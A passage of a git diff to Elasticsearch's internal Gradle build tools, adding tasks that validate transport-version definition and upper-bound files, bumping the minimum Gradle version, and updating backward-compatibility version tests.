diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionUpperBound.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionUpperBound.java
new file mode 100644
index 0000000000000..104a51ab79f70
--- /dev/null
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/TransportVersionUpperBound.java
@@ -0,0 +1,32 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the "Elastic License
+ * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
+ * Public License v 1"; you may not use this file except in compliance with, at
+ * your election, the "Elastic License 2.0", the "GNU Affero General Public
+ * License v3.0 only", or the "Server Side Public License, v 1".
+ */
+
+package org.elasticsearch.gradle.internal.transport;
+
+import java.nio.file.Path;
+
+/**
+ * An object to represent the loaded version of a transport version upper bound.
+ *
+ * An upper bound is the maximum transport version id that should be loaded for a given release branch.
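+ *
+ * <p>Serialized form, as parsed by {@code fromString} below: a single CSV line of the form {@code name,id}, in a file
+ * named after the release branch, e.g. a hypothetical {@code upper_bounds/9.0.csv} containing {@code my_new_feature,9123000}.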
+ */
+record TransportVersionUpperBound(String branch, String name, TransportVersionId id) {
+    public static TransportVersionUpperBound fromString(Path file, String contents) {
+        String filename = file.getFileName().toString();
+        assert filename.endsWith(".csv");
+        String branch = filename.substring(0, filename.length() - 4);
+
+        String[] parts = contents.split(",");
+        if (parts.length != 2) {
+            throw new IllegalStateException("Invalid transport version upper bound file [" + file + "]: " + contents);
+        }
+
+        return new TransportVersionUpperBound(branch, parts[0], TransportVersionId.fromString(parts[1]));
+    }
+}
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionReferencesTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionReferencesTask.java
new file mode 100644
index 0000000000000..6f7319bd4bcc6
--- /dev/null
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionReferencesTask.java
@@ -0,0 +1,67 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the "Elastic License
+ * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
+ * Public License v 1"; you may not use this file except in compliance with, at
+ * your election, the "Elastic License 2.0", the "GNU Affero General Public
+ * License v3.0 only", or the "Server Side Public License, v 1".
+ */
+
+package org.elasticsearch.gradle.internal.transport;
+
+import org.gradle.api.DefaultTask;
+import org.gradle.api.file.RegularFileProperty;
+import org.gradle.api.provider.Property;
+import org.gradle.api.services.ServiceReference;
+import org.gradle.api.tasks.CacheableTask;
+import org.gradle.api.tasks.InputDirectory;
+import org.gradle.api.tasks.InputFile;
+import org.gradle.api.tasks.Optional;
+import org.gradle.api.tasks.PathSensitive;
+import org.gradle.api.tasks.PathSensitivity;
+import org.gradle.api.tasks.TaskAction;
+import org.gradle.api.tasks.VerificationException;
+import org.gradle.api.tasks.VerificationTask;
+
+import java.io.IOException;
+import java.nio.file.Path;
+
+/**
+ * Validates that each transport version reference has a referable definition.
+ */
+@CacheableTask
+public abstract class ValidateTransportVersionReferencesTask extends DefaultTask implements VerificationTask {
+
+    @ServiceReference("transportVersionResources")
+    abstract Property<TransportVersionResourcesService> getTransportResources();
+
+    @InputDirectory
+    @Optional
+    @PathSensitive(PathSensitivity.RELATIVE)
+    public Path getDefinitionsDir() {
+        return getTransportResources().get().getDefinitionsDir();
+    }
+
+    @InputFile
+    @PathSensitive(PathSensitivity.RELATIVE)
+    public abstract RegularFileProperty getReferencesFile();
+
+    @TaskAction
+    public void validateTransportVersions() throws IOException {
+        Path namesFile = getReferencesFile().get().getAsFile().toPath();
+        TransportVersionResourcesService resources = getTransportResources().get();
+
+        for (var tvReference : TransportVersionReference.listFromFile(namesFile)) {
+            if (resources.referableDefinitionExists(tvReference.name()) == false) {
+                throw new VerificationException(
+                    "TransportVersion.fromName(\""
+                        + tvReference.name()
+                        + "\") was used at "
+                        + tvReference.location()
+                        + ", but lacks a"
+                        + " transport version definition. 
This can be generated with the task" // todo + ); + } + } + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionResourcesTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionResourcesTask.java new file mode 100644 index 0000000000000..4805493ee06d6 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/ValidateTransportVersionResourcesTask.java @@ -0,0 +1,290 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import com.google.common.collect.Comparators; + +import org.gradle.api.DefaultTask; +import org.gradle.api.file.ConfigurableFileCollection; +import org.gradle.api.provider.Property; +import org.gradle.api.services.ServiceReference; +import org.gradle.api.tasks.CacheableTask; +import org.gradle.api.tasks.InputDirectory; +import org.gradle.api.tasks.InputFiles; +import org.gradle.api.tasks.Optional; +import org.gradle.api.tasks.PathSensitive; +import org.gradle.api.tasks.PathSensitivity; +import org.gradle.api.tasks.TaskAction; +import org.gradle.api.tasks.VerificationException; +import org.gradle.api.tasks.VerificationTask; + +import java.io.IOException; +import java.nio.file.Path; +import java.util.ArrayList; +import java.util.Collection; +import java.util.Comparator; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.regex.Pattern; + +/** + * Validates that each defined transport version constant is referenced by at least one project. 
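+ *
+ * <p>In addition to reference checks, the validations below enforce (per the task action): definition names are
+ * lowercase alphanumerics and underscores, ids within a definition are ordered with a non-patch primary id, ids
+ * sharing a base are unique and contiguous, and each upper bound points at the latest id for its base.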
+ */
+@CacheableTask
+public abstract class ValidateTransportVersionResourcesTask extends DefaultTask implements VerificationTask {
+
+    @InputDirectory
+    @Optional
+    @PathSensitive(PathSensitivity.RELATIVE)
+    public Path getResourcesDir() {
+        return getResources().get().getTransportResourcesDir();
+    }
+
+    @InputFiles
+    @PathSensitive(PathSensitivity.RELATIVE)
+    public abstract ConfigurableFileCollection getReferencesFiles();
+
+    private record IdAndDefinition(TransportVersionId id, TransportVersionDefinition definition) {}
+
+    private static final Pattern NAME_FORMAT = Pattern.compile("[a-z0-9_]+");
+
+    @ServiceReference("transportVersionResources")
+    abstract Property<TransportVersionResourcesService> getResources();
+
+    @TaskAction
+    public void validateTransportVersions() throws IOException {
+        TransportVersionResourcesService resources = getResources().get();
+        Set<String> referencedNames = TransportVersionReference.collectNames(getReferencesFiles());
+        Map<String, TransportVersionDefinition> referableDefinitions = resources.getReferableDefinitions();
+        Map<String, TransportVersionDefinition> unreferableDefinitions = resources.getUnreferableDefinitions();
+        Map<String, TransportVersionDefinition> allDefinitions = collectAllDefinitions(referableDefinitions, unreferableDefinitions);
+        Map<Integer, List<IdAndDefinition>> idsByBase = collectIdsByBase(allDefinitions.values());
+        Map<String, TransportVersionUpperBound> upperBounds = resources.getUpperBounds();
+
+        for (var definition : referableDefinitions.values()) {
+            validateNamedDefinition(definition, referencedNames);
+        }
+
+        for (var definition : unreferableDefinitions.values()) {
+            validateUnreferencedDefinition(definition);
+        }
+
+        for (var entry : idsByBase.entrySet()) {
+            validateBase(entry.getKey(), entry.getValue());
+        }
+
+        for (var upperBound : upperBounds.values()) {
+            validateUpperBound(upperBound, allDefinitions, idsByBase);
+        }
+
+        validateLargestIdIsUsed(upperBounds, allDefinitions);
+    }
+
+    private Map<String, TransportVersionDefinition> collectAllDefinitions(
+        Map<String, TransportVersionDefinition> referableDefinitions,
+        Map<String, TransportVersionDefinition> unreferableDefinitions
+    ) {
+        Map<String, TransportVersionDefinition> allDefinitions = new HashMap<>(referableDefinitions);
+        for (var entry : unreferableDefinitions.entrySet()) {
+            TransportVersionDefinition existing = allDefinitions.put(entry.getKey(), entry.getValue());
+            if (existing != null) {
+                Path unreferablePath = getResources().get().getUnreferableDefinitionRepositoryPath(entry.getValue());
+                throwDefinitionFailure(existing, "has same name as unreferable definition [" + unreferablePath + "]");
+            }
+        }
+        return allDefinitions;
+    }
+
+    private Map<Integer, List<IdAndDefinition>> collectIdsByBase(Collection<TransportVersionDefinition> definitions) {
+        Map<Integer, List<IdAndDefinition>> idsByBase = new HashMap<>();
+
+        // first collect all ids, organized by base
+        for (TransportVersionDefinition definition : definitions) {
+            for (TransportVersionId id : definition.ids()) {
+                idsByBase.computeIfAbsent(id.base(), k -> new ArrayList<>()).add(new IdAndDefinition(id, definition));
+            }
+        }
+
+        // now sort the ids within each base so we can check density and quickly look up the highest id later
+        for (var ids : idsByBase.values()) {
+            ids.sort(Comparator.comparingInt(a -> a.id().complete()));
+        }
+
+        return idsByBase;
+    }
+
+    private void validateNamedDefinition(TransportVersionDefinition definition, Set<String> referencedNames) {
+
+        // validate any modifications
+        Map<Integer, TransportVersionId> existingIdsByBase = new HashMap<>();
+        TransportVersionDefinition originalDefinition = getResources().get().getReferableDefinitionFromMain(definition.name());
+        if (originalDefinition != null) {
+            validateIdenticalPrimaryId(definition, originalDefinition);
+            originalDefinition.ids().forEach(id -> existingIdsByBase.put(id.base(), id));
+        }
+
+        if (referencedNames.contains(definition.name()) == false) {
+            throwDefinitionFailure(definition, "is not referenced");
+        }
+        if (NAME_FORMAT.matcher(definition.name()).matches() == false) {
+            throwDefinitionFailure(definition, "does not have a valid name, must be lowercase alphanumeric and underscore");
+        }
+        if (definition.ids().isEmpty()) {
+            throwDefinitionFailure(definition, "does not contain any ids");
+        }
+        if (Comparators.isInOrder(definition.ids(), Comparator.naturalOrder()) == false) {
+            throwDefinitionFailure(definition, "does not have ordered ids");
+        }
+        for (int ndx = 0; ndx < definition.ids().size(); ++ndx) {
+            TransportVersionId id = definition.ids().get(ndx);
+
+            if (ndx == 0) {
+                if (id.patch() != 0) {
+                    throwDefinitionFailure(definition, "has patch version " + id.complete() + " as primary id");
+                }
+            } else {
+                if (id.patch() == 0) {
+                    throwDefinitionFailure(definition, "contains bwc id [" + id + "] with a patch part of 0");
+                }
+            }
+
+            // check modifications of ids on same branch, ie sharing same base
+            TransportVersionId maybeModifiedId = existingIdsByBase.get(id.base());
+            if (maybeModifiedId != null && maybeModifiedId.complete() != id.complete()) {
+                throwDefinitionFailure(definition, "modifies existing patch id from " + maybeModifiedId + " to " + id);
+            }
+        }
+    }
+
+    private void validateUnreferencedDefinition(TransportVersionDefinition definition) {
+        TransportVersionDefinition originalDefinition = getResources().get().getUnreferableDefinitionFromMain(definition.name());
+        if (originalDefinition != null) {
+            validateIdenticalPrimaryId(definition, originalDefinition);
+        }
+        if (definition.ids().isEmpty()) {
+            throwDefinitionFailure(definition, "does not contain any ids");
+        }
+        if (definition.ids().size() > 1) {
+            throwDefinitionFailure(definition, "contains more than one id");
+        }
+        // note: no name validation, anything that is a valid filename is ok, this allows eg initial_8.9.1
+    }
+
+    private void validateIdenticalPrimaryId(TransportVersionDefinition definition, TransportVersionDefinition originalDefinition) {
+        assert definition.name().equals(originalDefinition.name());
+
+        int primaryId = definition.ids().get(0).complete();
+        int originalPrimaryId = originalDefinition.ids().get(0).complete();
+        if (primaryId != originalPrimaryId) {
+            throwDefinitionFailure(definition, "has modified primary id from " + originalPrimaryId + " to " + primaryId);
+        }
+    }
+
+    private void validateUpperBound(
+        TransportVersionUpperBound upperBound,
+        Map<String, TransportVersionDefinition> definitions,
+        Map<Integer, List<IdAndDefinition>> idsByBase
+    ) {
+        TransportVersionDefinition upperBoundDefinition = definitions.get(upperBound.name());
+        if (upperBoundDefinition == null) {
+            throwUpperBoundFailure(upperBound, "contains transport version name [" + upperBound.name() + "] which is not defined");
+        }
+        if (upperBoundDefinition.ids().contains(upperBound.id()) == false) {
+            Path relativePath = getResources().get().getReferableDefinitionRepositoryPath(upperBoundDefinition);
+            throwUpperBoundFailure(upperBound, "has id " + upperBound.id() + " which is not in definition [" + relativePath + "]");
+        }
+
+        List<IdAndDefinition> baseIds = idsByBase.get(upperBound.id().base());
+        IdAndDefinition lastId = baseIds.getLast();
+        if (lastId.id().complete() != upperBound.id().complete()) {
+            throwUpperBoundFailure(
+                upperBound,
+                "has id "
+                    + upperBound.id()
+                    + " from ["
+                    + upperBound.name()
+                    + "] with base "
+                    + upperBound.id().base()
+                    + " but another id "
+                    + lastId.id().complete()
+                    + " from ["
+                    + lastId.definition().name()
+                    + "] is later for that base"
+            );
+        }
+
+        TransportVersionUpperBound existingUpperBound = getResources().get().getUpperBoundFromMain(upperBound.branch());
+        if (existingUpperBound != null) {
+            if (upperBound.id().patch() != 0 && upperBound.id().base() != existingUpperBound.id().base()) {
+                throwUpperBoundFailure(
+                    upperBound,
+                    "modifies base id from " + existingUpperBound.id().base() + " to " + upperBound.id().base()
+                );
+            }
+        }
+    }
+
+    private void validateBase(int base, List<IdAndDefinition> ids) {
+        // TODO: switch this to a fully dense check once all existing transport versions have been migrated
+        IdAndDefinition previous = ids.getLast();
+        for (int ndx = ids.size() - 2; ndx >= 0; --ndx) {
+            IdAndDefinition current = ids.get(ndx);
+
+            if (previous.id().equals(current.id())) {
+                Path existingDefinitionPath = getResources().get().getReferableDefinitionRepositoryPath(previous.definition());
+                throwDefinitionFailure(
+                    current.definition(),
+                    "contains id " + current.id() + " already defined in [" + existingDefinitionPath + "]"
+                );
+            }
+
+            if (previous.id().complete() - 1 != current.id().complete()) {
+                throw new IllegalStateException(
+                    "Transport version base id " + base + " is missing patch ids between " + current.id() + " and " + previous.id()
+                );
+            }
+            previous = current;
+        }
+    }
+
+    private void validateLargestIdIsUsed(
+        Map<String, TransportVersionUpperBound> upperBounds,
+        Map<String, TransportVersionDefinition> allDefinitions
+    ) {
+        // first id is always the highest within a definition, and validated earlier
+        // note we use min instead of max because the id comparator is in descending order
+        var highestDefinition = allDefinitions.values().stream().min(Comparator.comparing(d -> d.ids().get(0))).get();
+        var highestId = highestDefinition.ids().get(0);
+
+        for (var upperBound : upperBounds.values()) {
+            if (upperBound.id().equals(highestId)) {
+                return;
+            }
+        }
+
+        throwDefinitionFailure(
+            highestDefinition,
+            "has the highest transport version id [" + highestId + "] but is not present in any upper bounds files"
+        );
+    }
+
+    private void throwDefinitionFailure(TransportVersionDefinition definition, String message) {
+        Path relativePath = getResources().get().getReferableDefinitionRepositoryPath(definition);
+        throw new VerificationException("Transport version definition file [" + relativePath + "] " + message);
+    }
+
+    private void throwUpperBoundFailure(TransportVersionUpperBound upperBound, String message) {
+        Path relativePath = getResources().get().getUpperBoundRepositoryPath(upperBound);
+        throw new VerificationException("Transport version upper bound file [" + relativePath + "] " + message);
+    }
+}
diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/util/DependenciesUtils.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/util/DependenciesUtils.java
index 5d7386e2c2150..7120a5f907ddb 100644
--- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/util/DependenciesUtils.java
+++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/util/DependenciesUtils.java
@@ -66,7 +66,7 @@ public static FileCollection thirdPartyDependenciesView(Configuration configurat
             .stream()
             .filter(dep -> dep instanceof ResolvedDependencyResult)
             .map(dep -> (ResolvedDependencyResult) dep)
-            .filter(dep -> dep.getResolvedVariant().getDisplayName() == ShadowBasePlugin.COMPONENT_NAME)
+            .filter(dep -> dep.getResolvedVariant().getDisplayName() == ShadowBasePlugin.SHADOW)
             .filter(dep -> dep.getSelected() instanceof ResolvedComponentResult)
             .map(dep -> dep.getSelected().getId())
             .collect(Collectors.toSet())
diff --git
a/build-tools-internal/src/main/resources/checkstyle_suppressions.xml b/build-tools-internal/src/main/resources/checkstyle_suppressions.xml index 5fdfebf6849e7..98ded638773ce 100644 --- a/build-tools-internal/src/main/resources/checkstyle_suppressions.xml +++ b/build-tools-internal/src/main/resources/checkstyle_suppressions.xml @@ -37,6 +37,7 @@ + diff --git a/build-tools-internal/src/main/resources/minimumGradleVersion b/build-tools-internal/src/main/resources/minimumGradleVersion index 4dd804f10624c..c9277c5a601f8 100644 --- a/build-tools-internal/src/main/resources/minimumGradleVersion +++ b/build-tools-internal/src/main/resources/minimumGradleVersion @@ -1 +1 @@ -8.14.2 \ No newline at end of file +9.0.0 \ No newline at end of file diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/BwcVersionsSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/BwcVersionsSpec.groovy index a662a76db4da7..09f1f12dada77 100644 --- a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/BwcVersionsSpec.groovy +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/BwcVersionsSpec.groovy @@ -13,33 +13,40 @@ import spock.lang.Specification import org.elasticsearch.gradle.Version import org.elasticsearch.gradle.internal.BwcVersions.UnreleasedVersionInfo +import org.elasticsearch.gradle.internal.info.DevelopmentBranch class BwcVersionsSpec extends Specification { - List versionLines = [] + List versions = [] def "current version is next major"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('9.0.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('9.0.0') when: - def bwc = new BwcVersions(versionLines, v('9.0.0'), ['main', '8.x', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('9.0.0'), versions, [ + branch('main', '9.0.0'), + branch('8.x', '8.17.0'), + branch('8.16', '8.16.1'), + branch('8.15', '8.15.2'), + branch('7.17', '7.17.10') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:bugfix2'), - (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:bugfix'), - (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.x', ':distribution:bwc:minor'), + (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:major3'), + (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:major2'), + (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.x', ':distribution:bwc:major1'), (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.17.0'), v('9.0.0')] @@ -48,29 +55,36 @@ class BwcVersionsSpec extends Specification { def "current version is next major with staged minor"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - 
addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('9.0.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') + addVersion('9.0.0') when: - def bwc = new BwcVersions(versionLines, v('9.0.0'), ['main', '8.x', '8.17', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('9.0.0'), versions, [ + branch('main', '9.0.0'), + branch('8.x', '8.18.0'), + branch('8.17', '8.17.0'), + branch('8.16', '8.16.1'), + branch('8.15', '8.15.2'), + branch('7.17', '7.17.10'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:bugfix2'), - (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:bugfix'), - (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.17', ':distribution:bwc:staged'), - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.x', ':distribution:bwc:minor'), + (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:major4'), + (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:major3'), + (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.17', ':distribution:bwc:major2'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.x', ':distribution:bwc:major1'), (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.18.0'), v('9.0.0')] @@ -79,31 +93,39 @@ class BwcVersionsSpec extends Specification { def "current version is next major with two staged minors"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.16.2', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.17.1', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('8.19.0', '9.10.0') - addVersion('9.0.0', '10.0.0') - addVersion('9.1.0', '10.1.0') + addVersion('7.17.10') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.16.2') + addVersion('8.17.0') + addVersion('8.17.1') + addVersion('8.18.0') + addVersion('8.19.0') + addVersion('9.0.0') + addVersion('9.1.0') when: - def bwc = new BwcVersions(versionLines, v('9.1.0'), ['main', '9.0', '8.x', '8.18', '8.17', '8.16', '7.17']) + def bwc = new BwcVersions(v('9.1.0'), versions, [ + branch('main', '9.1.0'), + branch('9.0', '9.0.0'), + branch('8.x', '8.19.0'), + branch('8.18', '8.18.0'), + branch('8.17', '8.17.1'), + branch('8.16', '8.16.2'), + branch('7.17', '7.17.10') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.16.2')): new UnreleasedVersionInfo(v('8.16.2'), '8.16', ':distribution:bwc:bugfix2'), - (v('8.17.1')): new UnreleasedVersionInfo(v('8.17.1'), '8.17', ':distribution:bwc:bugfix'), - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:staged2'), - (v('8.19.0')): new UnreleasedVersionInfo(v('8.19.0'), '8.x', ':distribution:bwc:minor'), - (v('9.0.0')): new 
UnreleasedVersionInfo(v('9.0.0'), '9.0', ':distribution:bwc:staged'), + (v('8.16.2')): new UnreleasedVersionInfo(v('8.16.2'), '8.16', ':distribution:bwc:major4'), + (v('8.17.1')): new UnreleasedVersionInfo(v('8.17.1'), '8.17', ':distribution:bwc:major3'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:major2'), + (v('8.19.0')): new UnreleasedVersionInfo(v('8.19.0'), '8.x', ':distribution:bwc:major1'), + (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), '9.0', ':distribution:bwc:minor1'), (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.19.0'), v('9.0.0'), v('9.1.0')] @@ -112,22 +134,26 @@ class BwcVersionsSpec extends Specification { def "current version is first new minor in major series"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('9.0.0', '10.0.0') - addVersion('9.1.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') + addVersion('9.0.0') + addVersion('9.1.0') when: - def bwc = new BwcVersions(versionLines, v('9.1.0'), ['main', '9.0', '8.18']) + def bwc = new BwcVersions(v('9.1.0'), versions, [ + branch('main','9.1.0'), + branch('9.0', '9.0.0'), + branch('8.18', '8.18.0') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:maintenance'), - (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), '9.0', ':distribution:bwc:staged'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:major1'), + (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), '9.0', ':distribution:bwc:minor1'), (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.18.0'), v('9.0.0'), v('9.1.0')] @@ -136,23 +162,27 @@ class BwcVersionsSpec extends Specification { def "current version is new minor with single bugfix"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('9.0.0', '10.0.0') - addVersion('9.0.1', '10.0.0') - addVersion('9.1.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') + addVersion('9.0.0') + addVersion('9.0.1') + addVersion('9.1.0') when: - def bwc = new BwcVersions(versionLines, v('9.1.0'), ['main', '9.0', '8.18']) + def bwc = new BwcVersions(v('9.1.0'), versions, [ + branch('main','9.1.0'), + branch('9.0','9.0.1'), + branch('8.18','8.18.0') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:maintenance'), - (v('9.0.1')): new UnreleasedVersionInfo(v('9.0.1'), '9.0', ':distribution:bwc:bugfix'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:major1'), + (v('9.0.1')): new UnreleasedVersionInfo(v('9.0.1'), '9.0', ':distribution:bwc:minor1'), (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.18.0'), v('9.0.0'), v('9.0.1'), v('9.1.0')] @@ -161,25 +191,30 @@ class BwcVersionsSpec extends Specification { def "current version is new minor 
with single bugfix and staged minor"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('9.0.0', '10.0.0') - addVersion('9.0.1', '10.0.0') - addVersion('9.1.0', '10.0.0') - addVersion('9.2.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') + addVersion('9.0.0') + addVersion('9.0.1') + addVersion('9.1.0') + addVersion('9.2.0') when: - def bwc = new BwcVersions(versionLines, v('9.2.0'), ['main', '9.1', '9.0', '8.18']) + def bwc = new BwcVersions(v('9.2.0'), versions, [ + branch('main','9.2.0'), + branch('9.1','9.1.0'), + branch('9.0','9.0.1'), + branch('8.18', '8.18.0') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:maintenance'), - (v('9.0.1')): new UnreleasedVersionInfo(v('9.0.1'), '9.0', ':distribution:bwc:bugfix'), - (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), '9.1', ':distribution:bwc:staged'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:major1'), + (v('9.0.1')): new UnreleasedVersionInfo(v('9.0.1'), '9.0', ':distribution:bwc:minor2'), + (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), '9.1', ':distribution:bwc:minor1'), (v('9.2.0')): new UnreleasedVersionInfo(v('9.2.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.18.0'), v('9.0.0'), v('9.0.1'), v('9.1.0'), v('9.2.0')] @@ -188,30 +223,37 @@ class BwcVersionsSpec extends Specification { def "current version is next minor"() { given: - addVersion('7.16.3', '8.9.0') - addVersion('7.17.0', '8.9.0') - addVersion('7.17.1', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.17.1', '9.10.0') - addVersion('8.18.0', '9.10.0') + 